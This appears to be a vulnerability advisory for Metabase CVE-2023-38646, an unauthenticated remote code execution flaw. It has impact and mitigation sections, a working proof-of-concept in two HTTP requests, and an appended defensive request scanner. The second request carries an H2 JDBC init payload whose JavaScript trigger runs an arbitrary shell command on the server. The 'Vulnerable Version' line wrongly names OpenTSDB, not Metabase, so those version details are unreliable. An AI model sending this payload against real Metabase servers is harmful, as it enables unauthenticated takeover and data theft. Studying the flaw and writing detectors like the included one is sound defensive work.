Metabase Pre-Auth JDBC RCE – CVE-2023-38646

Vulnerable Version

OpenTSDB <= 2.4.1

Fixed Version

Update to the latest version

Base Score

9.8 Critical

Vendor Description

Metabase is an open-source business intelligence (BI) and analytics platform that aims to make data discovery simple and accessible. It enables users to connect to several databases, build visual dashboards, and generate insights without requiring much technical knowledge. Teams may easily analyze data by writing SQL queries or using a graphical query builder. Metabase is extensively used for self-service analytics because it reduces the need for complex configurations and allows non-technical people to interact with data simply. It is accessible in both free community and enterprise editions, which include sophisticated capabilities for large businesses.

CVE-2023-38646 Description

CVE-2023-38646 originates from the “/api/setup/validate” endpoint used during Metabase installation. This endpoint validates a JDBC connection before allowing any further setup. The security flaw is the result of a logic error during the validation process, specifically in the handling of certain fault scenarios. Attackers can exploit this problem by submitting a malicious JDBC connection string with specially crafted content that causes unexpected code execution on the Metabase server. This execution bypasses all authentication checks, giving the attacker unfettered control of the compromised machine.

Impact

  • Full Server Access: With full control of the server, attackers can steal sensitive data such as user credentials, corporate reports, and secret information contained in connected databases.
  • Malware Deployment: Malware can be deployed to encrypt data, disrupt services, or commandeer resources for cybercriminal purposes such as bitcoin mining.
  • Lateral Movement: The hacked server can act as a springboard for lateral movement inside the network, potentially compromising other connected systems and infrastructure.
  • Data manipulation: Attackers can tamper with or fake data on Metabase dashboards, resulting in faulty analysis and potentially detrimental decision-making based on altered information.

Mitigations

  • Disable Unused Features: If not in use, disable the Metabase setup API to reduce the attack surface.
  • Network Segmentation: Keep Metabase servers separate from key databases and sensitive data sources to prevent potential damage in the event of a hack.
  • Access Control: Use rigorous access controls to limit user privileges and Metabase capabilities.
  • Regular Backups: Make regular backups of your Metabase database and linked systems to aid in data recovery in the event of an attack.
  • Intrusion Detection and Monitoring: Use intrusion detection and monitoring systems to identify suspicious behavior and probable compromise attempts.

PoC

First, use the following request to retrieve the setup-token.

GET /api/session/properties HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0


The vulnerability can only be exploited with this setup token. Second, replace [setup-token] in the following request with the token you retrieved and send it:

POST /api/setup/validate HTTP/1.1
Host: localhost:3000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.110 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/json
Content-Length: 739

{
    "token": "[setup-token]",
    "details":
    {
        "is_on_demand": false,
        "is_full_sync": false,
        "is_sample": false,
        "cache_ttl": null,
        "refingerprint": false,
        "auto_run_queries": true,
        "schedules":
        {},
        "details":
        {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "advanced-options": false,
            "ssl": true,
            "init": "CREATE TRIGGER shell3 BEFORE SELECT ON INFORMATION_SCHEMA.TABLES AS $$//javascript\u000A\u0009java.lang.Runtime.getRuntime().exec('touch /tmp/success')\u000A$$"
        },
        "name": "an-sec-research-team",
        "engine": "h2"
    }
}

As shown, the touch /tmp/success command executed successfully on the server.
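A defender-side complement to the PoC above, added here and not part of the original post: it inspects logged requests to /api/setup/validate and flags H2 connection details that carry an INIT script or point the database at a local file or zip path, which is exactly the shape of the request shown above. The sample requests and the indicator patterns are my own constructions, not Metabase's patch logic.

```python
import json
import re

# Constructed sample requests (method, path, body), as a reverse proxy or WAF
# might record them. Not captured traffic: the first mirrors the request shape
# in the PoC with the trigger body elided, the others are benign traffic.
SAMPLE_REQUESTS = [
    ("POST", "/api/setup/validate", json.dumps({
        "token": "[setup-token]",
        "details": {"engine": "h2", "name": "an-sec-research-team", "details": {
            "db": "zip:/app/metabase.jar!/sample-database.db;MODE=MSSQLServer;",
            "init": "CREATE TRIGGER t BEFORE SELECT ON INFORMATION_SCHEMA.TABLES "
                    "AS $$//javascript\n(elided)\n$$"}}})),
    ("POST", "/api/setup/validate", json.dumps({
        "token": "[setup-token]",
        "details": {"engine": "postgres", "details": {"host": "db.internal", "port": 5432}}})),
    ("GET", "/api/session/properties", ""),
]

# SQL constructs in an H2 INIT script that define code or run scripts (heuristic, my choice).
SUSPICIOUS_SQL = re.compile(r"(?i)CREATE\s+(OR\s+REPLACE\s+)?(TRIGGER|ALIAS)|//javascript|RUNSCRIPT")

def inspect_request(method, path, body):
    """Return finding strings for one request; an empty list means nothing was flagged."""
    if method.upper() != "POST" or path.split("?")[0] != "/api/setup/validate":
        return []
    try:
        doc = json.loads(body)
        if not isinstance(doc, dict): raise ValueError
    except ValueError:
        return ["setup/validate with a non-JSON body"]
    outer = doc.get("details") or {}
    conn = outer.get("details") or {}
    if str(outer.get("engine", "")).lower() != "h2":
        return []  # the INIT trick shown in the PoC is specific to the H2 driver
    findings = []
    db, init = str(conn.get("db", "")), str(conn.get("init", ""))
    if "init" in conn:
        findings.append("h2 'init' parameter supplied")
    if re.search(r"(?i);\s*INIT\s*=", db):
        findings.append("INIT= embedded in the H2 JDBC URL")
    if db.lower().startswith(("zip:", "file:")):
        findings.append("H2 URL opens a local file or zip path")
    if SUSPICIOUS_SQL.search(init + " " + db):
        findings.append("SQL that defines a trigger/alias or runs a script")
    return findings

def scan(requests=SAMPLE_REQUESTS):
    """Map request index -> findings for every request that produced any."""
    return {i: f for i, (m, p, b) in enumerate(requests) if (f := inspect_request(m, p, b))}
```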


PoC Video
